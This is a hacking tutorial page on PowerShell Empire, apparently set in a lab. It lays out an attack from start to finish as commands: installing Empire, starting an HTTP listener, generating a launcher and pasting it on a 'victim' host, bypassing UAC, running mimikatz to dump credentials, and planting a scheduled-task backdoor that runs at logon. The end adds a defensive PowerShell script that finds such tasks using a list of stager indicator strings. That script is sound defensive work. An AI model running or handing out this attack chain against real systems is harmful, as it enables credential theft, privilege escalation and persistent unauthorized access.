Powershell
Powershell is the object-oriented replacement for the ancient Windows cmd.exe. It is not present on all installations of Windows, but can be added via a download from Microsoft.
There are five versions of Powershell at the moment (2018). You can start it by typing powershell in the Run dialog or at a cmd prompt.
Before going any further, read this presentation:
https://cdn.shopify.com/s/files/1/0177/9886/files/nmittal.pdf
And see this quick description with handy hints:
https://www.darkoperator.com/blog/2013/1/10/powershell-basicsndashthe-environment.html
Empire
Empire lets you run Powershell agents without needing Powershell to be installed on your target.
Here’s a good intro:
https://ethicalhackingblog.com/hacking-powershell-empire-2-0/
You may need to install Empire:
git clone https://github.com/EmpireProject/Empire.git
cd Empire
chmod +x install.sh
./install.sh
The installer asks for a password; enter one or let it generate one for you.
Create a listener
Start Empire:
./empire
# list listeners
listeners
# use the http listener
uselistener http
execute
# now our listener should show up:
listeners
Create a Powershell script with the launcher and deliver it to your victim
Create a launcher:
launcher
Generate a Powershell script with the listener name http:
launcher powershell http
Copy the resulting Powershell script.
Open a new terminal and start a remote desktop session (this is noisy, so consider a quieter terminal alternative):
rdesktop -u IEUser -p password 192.168.0.11
In the remote desktop, open a cmd shell and paste in the script. Hit Enter.
Back in the Linux Empire terminal session, see that there is now an agent active.
In this terminal go back to the main window:
back
List available agents:
agents
Note the Name of the agent. It’s random and complex, so rename it:
rename [old name] [new name]
Now to list the active agents enter:
list
Interact with our agent:
interact http
Get info on the agent:
info
High_integrity 0 means we’re not an admin.
Become an admin, amazingly, with a single command, followed by the name of the listener:
bypassuac http
Now type:
[enter]
back
list
Note the new agent and the user names listed. An asterisk indicates a power user. Rename this new agent too:
rename [old name] [new name]
Now let’s interact with the new agent:
interact [agent name]
info
High_integrity 1 now indicates we’re admin!
List all extracted passwords (there aren’t any yet):
creds
Run mimikatz and wait for it to execute. Note that this may crash the LSASS process, making us very conspicuous. See another way to get AD information at https://schoolforhackers.com/penetration-testing-windows-active-directory-extracting-ntds-and-cracking-hashes/.
mimikatz
Once it’s done type:
creds
and see the cracked passwords.
Create a persistent backdoor with the module schtasks:
usemodule persistence/elevated/schtasks
# check its options
info
# set the options
set OnLogon True
set Listener http
# exploit!
execute
Now our backdoor will execute every time the user logs on.
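What this leaves behind on the host is a scheduled task with a logon trigger whose action runs powershell.exe with stager-style arguments, which is exactly what a defender can hunt for. The script below is an added example for that side of the exercise; it is not part of the original tutorial or of Empire, it uses only the built-in ScheduledTasks cmdlets, and the indicator strings it matches on are this example's own assumption to tune per environment.

```powershell
# Added detection example (not from the original tutorial or from Empire).
# Enumerates scheduled tasks whose action launches PowerShell with arguments
# typical of one-liner stagers, and flags those with a logon trigger, which is
# what persistence/elevated/schtasks with OnLogon True leaves behind.
# Needs the built-in ScheduledTasks module (Windows 8 / Server 2012 and later).

# Indicator fragments are an assumption for this example; tune to your environment.
$SuspiciousArgs = @('-enc', '-encodedcommand', '-nop', '-noprofile',
                    '-w hidden', '-windowstyle hidden', '-exec bypass',
                    'iex', 'invoke-expression', 'downloadstring', 'frombase64string')

function Get-SuspiciousLogonTask {
    param(
        # When set, only report tasks that actually have a logon trigger.
        [switch]$LogonOnly
    )

    Get-ScheduledTask | ForEach-Object {
        $task = $_
        $hasLogon = @($task.Triggers | Where-Object {
            $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }).Count -gt 0
        if ($LogonOnly -and -not $hasLogon) { return }   # skip this task

        foreach ($action in @($task.Actions)) {
            if (-not $action.Execute) { continue }   # e.g. COM handler actions
            $exe = [IO.Path]::GetFileName($action.Execute).ToLower()
            if ($exe -notin 'powershell.exe', 'pwsh.exe') { continue }

            $argText = "$($action.Arguments)".ToLower()
            $hits = @($SuspiciousArgs | Where-Object { $argText.Contains($_) })
            if ($hits.Count -eq 0) { continue }

            [pscustomobject]@{
                TaskPath     = $task.TaskPath
                TaskName     = $task.TaskName
                RunsAs       = $task.Principal.UserId
                RunLevel     = $task.Principal.RunLevel   # 'Highest' = runs elevated
                LogonTrigger = $hasLogon
                Indicators   = ($hits -join ', ')
                Arguments    = $action.Arguments
            }
        }
    }
}

# Review every match; preserve the task XML with Export-ScheduledTask before removing it.
Get-SuspiciousLogonTask -LogonOnly | Format-List
```

Run it elevated so tasks registered under other principals are visible; Security event 4698 (task created) and the TaskScheduler/Operational log give the creation time and account to correlate with.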